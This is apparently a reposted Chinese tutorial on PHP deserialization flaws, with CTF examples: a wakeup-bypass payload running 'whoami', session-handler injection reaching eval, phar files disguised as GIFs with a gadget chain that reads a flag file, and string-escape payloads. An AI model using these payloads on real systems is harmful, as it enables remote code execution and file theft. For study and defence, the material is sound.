0x1 序列化与反序列化 

0x1.1序列化

PHP序列化：serialize()

序列化是将变量或对象转换成字符串的过程，用于存储或传递 PHP 的值的过程中，同时不丢失其类型和结构。

php序列化的字母标示及其含义

a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string
N - NULL

常见类型的序列化

N;

b:<digit>;  

i:<number>;

d:<number>;

s:<length>:"<value>";

a:<n>:{<key 1><value 1><key 2><value 2>...<key n><value n>}

O:<length>:"<class name>":<n>:{<field name 1><field value 1>
<field name 2><field value 2>...<field name n><field value n>}

例子:

<?php
class ye1s{
   public  $v1;
   public  $v2=false;
   public  $v3=1;
   public  $v4="public";
   private $v5="private";
   protected $v6="protected";
}
$s=serialize(new ye1s());
echo $s;
//var_dump(unserialize($s));

运行结果

O:4:"ye1s":6:{s:2:"v1";N;s:2:"v2";b:0;s:2:"v3";i:1;s:2:"v4";s:6:"public";s:8:"ye1sv5";s:7:"private";s:5:"*v6";s:9:"protected";}

其中在PHP的字段名中， protected 声明的字段为保护字段，在所声明的类和该类的子类中可见，但在该类的对象实例中不可见。因此保护字段的字段名在序列化时，字段名前面会加上*的前缀。这里的 表示 ASCII 码为 0 的字符，而不是 组合。

private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，字段名前面会加上<declared class name>的前缀。这里<declared class name> 表示的是声明该私有字段的类的类名，而不是被序列化的对象的类名。因为声明该私有字段的类不一定是被序列化的对象的类，而有可能是它的祖先类。

字段名被作为字符串序列化时，字符串值中包括根据其可见性所加的前缀。字符串长度也包括所加前缀的长度。其中 字符也是计算长度的。

0x1.2 反序列化

PHP反序列化：unserialize()

反序列化是将字符串转换成变量或对象的过程

例子

<?php
class ye1s{
   public  $v1;
   public  $v2=false;
   public  $v3=1;
   public  $v4="public";
   private $v5="private";
   protected $v6="protected";
}
$s=serialize(new ye1s());
var_dump(unserialize($s));

运行结果

object(ye1s)#1 (6) {
  ["v1"]=>
  NULL
  ["v2"]=>
  bool(false)
  ["v3"]=>
  int(1)
  ["v4"]=>
  string(6) "public"
  ["v5":"ye1s":private]=>
  string(7) "private"
  ["v6":protected]=>
  string(9) "protected"
}

 0x2  反序列化漏洞 

反序列化漏洞：主要是反序列化的过程中某些参数可控，传入一些精心构造的字符串，从而控制内部的变量设置函数，执行想要的操作。

魔术方法

__destruct()：//析构函数当对象被销毁时会自动调用。 
__wakeup() ：//unserialize()时会自动调用。
__invoke(): //当尝试以调用函数的方法调用一个对象时，会自动调
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__construct()：//构造函数，当对象创建(new)时会自动调用但在unserialize()时是不会自动调用的。
__sleep():  //serialize()函数会检查类中是否存在一个魔术方法__sleep().如果存在，该方法会被优先调用。   

例子：

2017福建省百越杯awd题目的修改

<?php
class home{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
    function ping($host){
        system("ping -c 2 $host");
    }

    function __wakeup(){
        $this->args=array("127.0.0.1");
    }
}
$a=@$_GET['a'];
@unserialize($a);
?>

在php字符串反序列化中会自动调用wakeup方法，对象销毁时又会调用destruct,destruct中可以调用ping方法，可以命令执行。wakeup里给args赋值，导致args变量不可控，所以想办法不让其调用wakeup ,当PHP5 < 5.6.25、PHP7 < 7.0.1时，成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)

<?php
class home
{
    private $method;
    private $args = array('1|whoami');
}
echo urlencode(serialize(new home()));

 0x3  session 反序列化 

php session的利用详情可看我之前的一篇文章：https://xz.aliyun.com/t/8221

0x3.1相关概念

PHP session概念: PHP session 是一个特殊的变量，用于存储有关用户会话的信息，或更改用户会话的设置。session 变量保存的信息是单一用户的，并且可供应用程序中的所有页面使用。它为每个访问者创建一个唯一的 id (UID)，并基于这个 UID 来存储变量。UID 存储在 cookie 中，亦或通过 URL 进行传导。

会话过程：当开始一个会话时，PHP 会尝试从请求中查找会话 ID （通常通过会话 cookie）， 如果请求中不包含会话 ID 信息，PHP 就会创建一个新的会话。会话开始之后，PHP 就会将会话中的数据设置到 _SESSION 中的内容，并将其进行序列化， 然后发送给会话保存管理器来进行保存。

默认情况下，PHP 使用内置的文件会话保存管理器（files）来完成会话的保存。可以通过调用函数 session_start() 来手动开始一个会话。如果配置项 session.auto_start 设置为1， 那么请求开始的时候，会话会自动开始。

PHP 脚本执行完毕之后，会话会自动关闭。同时，也可以通过调用函数 session_write_close() 来手动关闭会话。

常见配置在 PHP 的安装目录下面找到 php.ini 文件，这个文件主要的作用是对 PHP 进行一些配置

session.save_handler = files #session的存储方式
session.save_path = "/var/lib/php/session" #session id存放路径
session.use_cookies= 1 #使用cookies在客户端保存会话
session.use_only_cookies = 1 #去保护URL中传送session id的用户
session.name = PHPSESSID #session名称（默认PHPSESSID）
session.auto_start = 0 #不启用请求自动初始化session
session.use_trans_sid = 0  #如果客户端禁用了cookie，
#可以通过设置session.use_trans_sid来使标识的交互方式从cookie变为url传递
session.cookie_lifetime = 0 #cookie存活时间（0为直至浏览器重启，单位秒）
session.cookie_path = / #cookie的有效路径
session.cookie_domain = #cookie的有效域名
session.cookie_httponly = #httponly标记增加到cookie上(脚本语言无法抓取)
session.serialize_handler = php #PHP标准序列化
session.gc_maxlifetime =1440 #过期时间(默认24分钟，单位秒)

存储引擎

PHP 中的 session 中的内容默认是以文件的方式来存储的，存储方式就是由配置项session.save_handler 来进行确定的，默认是以文件的方式存储。存储的文件是以 sess_PHPSESSID 来进行命名的，文件的内容就是 session 值的序列话之后的内容。

session.serialize_handler 是用来设置 session 的序列话引擎的，除了默认的 PHP 引擎之外，还存在其他引擎，不同的引擎所对应的 session 的存储方式不相同。

session.serialize_handler 有如下三种取值

存储引擎	存储方式
php_binary	键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php	键名+竖线+经过serialize()函数序列处理的值
php_serialize	(PHP>5.5.4)经过serialize()函数序列化处理的数组

在 PHP 中默认使用的是 PHP 引擎，如果要修改为其他的引擎，只需要添加代码ini_set('session.serialize_handler', '需要设置的引擎'),示例代码如下：

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
// do something

以如下代码为例，查看不同存储引擎存储的结果

<?php
error_reporting(0);
ini_set('session.serialize_handler','php_binary');//这里换不同的存储引擎
session_start();
$_SESSION['username'] = $_GET['username'];
?>

php_binary

php

php_serialize

0x3.2反序列化漏洞

当网站序列化存储 session 与反序列化读取 session 的方式不同时，就可能导致 session 反序列化漏洞的产生。一般都是以 php_serialize 序列化存储 session， 以 PHP 反序列化读取 session，造成反序列化攻击。

0x3.2.1 有$_SESSION赋值

例子
s1.php

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["username"]=$_GET["u"];
?>

s2.php

<?php
session_start();
class session {
    var $var; 
    function __destruct() {
         eval($this->var);
    }
}
?>

s1.php 使用的是 php_serialize 存储引擎，s2.php 使用的是 php 存储引擎(页面中没有设置存储引擎，默认使用的是 php.ini 中 session.serialize_handler 设置的值，默认为 php)

我们可以往s1.php传入如下的参数。

s1.php?u=|O:7:"session":1:{s:3:"var";s:10:"phpinfo();";}

此时使用的是 php_seriallize 存储引擎来序列化，存储的内容为

接着访问s2.php,使用的是 php 存储引擎来反序列化，结果

这是因为当使用 php 引擎的时候，php 引擎会以 | 作为作为 key 和 value 的分隔符，那么就会将a:1:{s:8:"username";s:47:"作为 session 的 key，将O:7:"session":1:{s:3:"var";s:10:"phpinfo();";}";}作为 value，然后进行反序列化。访问s2.php为什么会反序列化？这里可以可以看看官方文档。

那串 value 不符合"正常"的被反序列化的字符串规则不会报错吗？这里提到一个unserialize 的特性，在执行 unserialize 的时候，如果字符串前面满足了可被反序列化的规则即后续的不规则字符会被忽略。

0x3.2.2 无$_SESSION赋值

上面的例子直接可以给 $_SESSION 赋值,那当代码中不存在给 $_SESSION 赋值的时候，又该如何处理？查看官方文档，可知还存在 PHP 还存在一个 upload_process 机制，可以在$_SESSION中创建一个键值对，其中的值可以控制。

以 Jarvis OJ 平台的PHPINFO题目为例
环境地址：http://web.jarvisoj.com:32784/

index.php

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

存在 phpinfo.php 文件,由此可知 session.upload_progress.enabled 为 On，session.serialize_handler 为 php_serialize，与 index.php 页面所用的 PHP 存储引擎不同，存在反序列化攻击。session.upload_progress.name 为 PHP_SESSION_UPLOAD_PROGRESS，可以本地创建form.html，一个向 index.php 提交 POST 请求的表单文件，其中包括PHP_SESSION_UPLOAD_PROGRESS 变量。

form.html

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

使用 bp 抓包,在 PHP_SESSION_UPLOAD_PROGRESS 的 value 值123后面添加 | 和序列化的字符串。

查看根目录文件

查看根目录路径

读取 flag

 0x4 phar 反序列化 

phar反序列化就是可以在不使用php函数unserialize()的前提下，进行反序列化，从而引起的严重的php对象注入漏洞。

phar文件结构

四部分构成

• stub：phar文件标识，前面内容不限，但必须以 __HALT_COMPILER();?>来结尾，否则phar扩展将无法识别这个文件为phar文件
• manifest：压缩文件的属性等信息，以序列化的形式存储自定义的meta-data。
• contents：压缩文件的内容
• signature：签名，在文件末尾

缘由

漏洞触发点在使用phar://协议读取文件的时候，文件内容会被解析成phar对象，然后phar对象内的Metadata信息会被反序列化。当内核调用phar_parse_metadata()解析metadata数据时，会调用php_var_unserialize()对其进行反序列化操作，因此会造成反序列化漏洞。

利用条件

• phar文件要能够上传到服务器端。
• 要有可用的魔术方法作为“跳板”。
• 文件操作函数的参数可控，且:、/、phar等特殊字符没有被过滤。

有序列化数据必然会有反序列化操作，php一大部分的文件系统函数在通过phar://伪协议解析phar文件时，都会将meta-data进行反序列化，测试后受影响的函数如下：

生成文件

根据文件结构我们来自己构建一个 phar 文件，php内置了一个 Phar 类来处理相关操作。注意：要将 php.ini 中的 phar.readonly 选项设置为Off，否则无法生成 phar 文件。

<?php
class TestObject {
}

@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub，增加gif文件头
$o = new TestObject();
$phar->setMetadata($o); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

例题

[SWPUCTF 2018]SimplePHP

class.php

<?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|..|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|../i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

exp

<?php
class C1e4r
{
    public $test;
    public $str;

}

class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;
}
$test=new Test();
$show=new Show();
$c1e4r=new C1e4r();
$c1e4r->str=$show;
$show->str['str']=$test;
$test->params['source']='/var/www/html/f1ag.php';

$phar = new Phar("phar1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub，增加gif文件头
$phar->setMetadata($c1e4r); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

上传后

/file.php?file=phar://upload/19b39eddec74b32461a3673dea6b7871.jpg

 0x5 反序列化字符逃匿 

在反序列化前，对序列化后的字符串进行替换或者修改，使得字符串的长度发生了变化，通过构造特定的字符串，导致对象注入等恶意操作。

PHP 反序列化特性

1. PHP 在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的。
2. 在反序列化的时候php会根据s所指定的字符长度去读取后边的字符。如果指定的长度错误则反序列化就会失败
3. 对类中不存在的属性也会进行反序列化

0x5.1过滤后字符变多

示例代码

<?php
include 'flag.php';
function filter($string){
    return str_replace('x','yy',$string);
}
$username = $_GET['u'];
$password = "aaa";
$user = array($username, $password);
$s = serialize($user);
$r = filter($s);
echo $r;
$a= unserialize($r);
if($a[1]==='admin'){
    echo $flag;
}
highlight_file(__FILE__);

?>

此题中对序列化字符串中的x替换为yy,可能导致字符串长度增加。

当传入u=admin,序列化为

a:2:{i:0;s:5:"admin";i:1;s:3:"aaa";}

反序列化后满足不了$a[1]==='admin'条件

当传入u=xxxxxxxxxxxxxxxxxxx";i:1;s:5:"admin";}，此时替换序列化的结果为

a:2:a:2:{i:0;s:38:"yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:5:"admin";}";i:1;s:3:"aaa";}

此时yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy的长度刚好为38，不会报错，再加上后面的;i:1;s:5:"admin";}成功反序列化，后面的就被忽略了。

x个数的计算
首先我们要确定需要添加的内容，也就是后面一串，即";i:1;s:5:"admin";}，长度为19(设为m)，满足以下式子(设有n个x字符，";i:1;s:5:"admin";}前面有y个非x字符)：

n+y+m=2n+y // 原来字符串的长度 = 替换后去掉m的长度

解方程得n=19，即我们要有19个x，y随意，从等式可以看出抵消了。

0x5.2过滤后字符变少

示例代码

<?php
include 'flag.php';
function filter($string){
    return str_replace('sec','',$string);
}
$username = $_GET['u'];
$password = $_GET['p'];
$auth="guest";
$user = array($username, $password,$auth);
$s = serialize($user);
$r = filter($s);
echo $r;
$a= unserialize($r);
if($a[2]==='admin'){
    echo $flag;
}
highlight_file(__FILE__);

?>

要想得到flag，就要使得";i:2;s:5:"admin";}，长度为19，经过观察序列化后";i:1;s:这部分是不会改变的，因为整个payload肯定是不超过100个字符的，所以加上后面的长度";i:1;s:xx:" 为12个字符，这里存在着sec的替换，我们可以输入4个sec替换为空格，刚好空出12个字符，可以将";i:1;s:xx:"这12个字符反序列化后在第一个元素值中，使得后面逃匿。
最后payload

u=secsecsecsec&p=";i:1;s:4:"eval";i:2;s:5:"admin";}

也可以多添加几个sec，假设为5个，此时空出15个字符，减去";i:1;s:xx:"这12个字符，还剩下3个，可以再输入三个字符填充。

u=secsecsecsecsec&p=123";i:1;s:4:"eval";i:2;s:5:"admin";}

 参考文章 

PHP 序列化（serialize）格式详解浅谈php反序列化漏洞
PHP中SESSION反序列化机制PHP反序列化 — 字符逃逸

原文始发于微信公众号（SAINTSEC）：详解PHP反序列化常见安全问题